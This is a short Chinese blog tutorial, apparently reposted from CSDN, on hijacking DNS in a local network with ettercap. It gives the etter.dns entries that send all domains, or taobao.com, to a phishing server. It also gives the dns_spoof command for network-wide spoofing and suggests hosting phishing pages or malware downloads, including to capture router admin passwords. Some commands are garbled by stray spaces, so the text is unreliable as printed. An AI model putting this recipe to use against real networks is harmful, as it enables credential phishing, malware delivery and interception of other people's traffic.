使用ettercap进行DNS劫持
作者:互联网
DNS劫持简介
DNS ( Domain Name System ,域名系
统) ,在互联网上作为域名和IP地址相互映射的
-个分布式数据库。DNS劫持又称域名劫持,是
指在劫持的网络范围内拦截域名解析的请求,分
析请求的域名,把审查范围以外的请求放行,或
者返回假的IP地址或者什么都不做使请求失去响
应,其效果就是对特定的网络不能反应或访问的
是假网址。
DNS被劫持后,常见的攻击行为主要有:
网络钓鱼、干扰用户正常访问网络、威胁用户账号
信息及财产安全等。
使用ettercap进行DNS劫持
网关192.168.0.1
目标192.168.0.205
本机192.1 68.0.203
钓鱼服务器192.168.0.207
典型步骤:
1编辑ettercap的规则文件,修改DNS解析(最末端)
nano /etc/ettercap/etter.dns
- A 192.168.0.207 把所有解析劫持到此IP
或
*.taobao.com A 192.168.0.207添加正向解析
*taobao.com PTR 192.1 68.0.207添加反向解析
2.在钓鱼服务器搭建网页或者恶意软件下载
3.使用ettercap及dns_ spoof插件进行全网劫持
ettercap -Tq-i eth0 -P dns_ spoof /// ///
可以在cmd下使用ipconfig/flushdns命令刷新DNS缓存
也可使用图形界面进行劫持
可以成为钓鱼获取无线路由器管理登录密码的方法补充
标签:劫持,ettercap,DNS,192.168,域名,dns 来源: https://blog.csdn.net/m0_50086474/article/details/116425979